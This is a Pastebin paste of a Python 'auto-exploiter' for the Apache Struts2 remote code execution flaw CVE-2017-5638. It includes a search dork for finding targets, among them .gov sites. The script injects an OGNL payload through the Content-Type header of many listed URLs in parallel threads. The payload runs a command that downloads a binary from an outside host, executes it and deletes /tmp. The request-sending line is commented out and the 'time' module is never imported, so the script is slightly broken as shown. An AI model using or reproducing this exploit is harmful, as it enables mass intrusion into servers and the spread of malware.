API tools faq
paste
Advertisement
miraip0ts

Apache Struts2 (CVE-2017-5638) RCE Auto-Exploiter v2

miraip0ts
Apr 9th, 2017
796
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.13 KB | None | 0 0
raw download clone embed print report diff
  1. #!/usr/bin/python
  2. # Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | By; LiGhT
  3. # Dork: "site:com filetype:action"
  4. # site example^: org,net,egu,gov,io,pw
  5.  
  6. import urllib2
  7. import httplib
  8. import sys, re, os
  9. from threading import Thread
  10.  
  11. strutz = open(sys.argv[1], "r").readlines()
  12. cmd = "cd /tmp ; wget http://1.1.1.1/kys7t ; chmod 777 kys7t ; ./kys7t ; rm -rf /tmp/*" # COMMAND HERE Arch(s): x86, i686
  13.  
  14. def exploit(url, cmd):
  15.     #page = ''
  16.     payload = "%{(#_='multipart/form-data')."
  17.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
  18.     payload += "(#_memberAccess?"
  19.     payload += "(#_memberAccess=#dm):"
  20.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
  21.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
  22.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
  23.     payload += "(#ognlUtil.getExcludedClasses().clear())."
  24.     payload += "(#context.setMemberAccess(#dm))))."
  25.     payload += "(#cmd='%s')." % cmd
  26.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
  27.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
  28.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
  29.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
  30.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
  31.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
  32.     payload += "(#ros.flush())}"
  33.     try:
  34.         url = ''.join(url)
  35.         if "http://" not in url:
  36.             url = "http://"+url
  37.         elif "https://" in url:
  38.             url = url.replace("https://", "http://")
  39.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
  40.         request = urllib2.Request(url, headers=headers)
  41.         print "\033[32mPayload Sent!"
  42.         #page = urllib2.urlopen(request).read()
  43.     except httplib.IncompleteRead, e:
  44.         pass
  45.     except KeyboardInterrupt:
  46.         pass
  47.     except Exception:
  48.         pass
  49.     #print "\n\033[35m%s"%(page)
  50.  
  51.  
  52. for url in strutz:
  53.     try:
  54.         l33t = Thread(target=exploit, args=(url,cmd,))
  55.         l33t.start()
  56.         time.sleep(0.09)
  57.     except:
  58.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!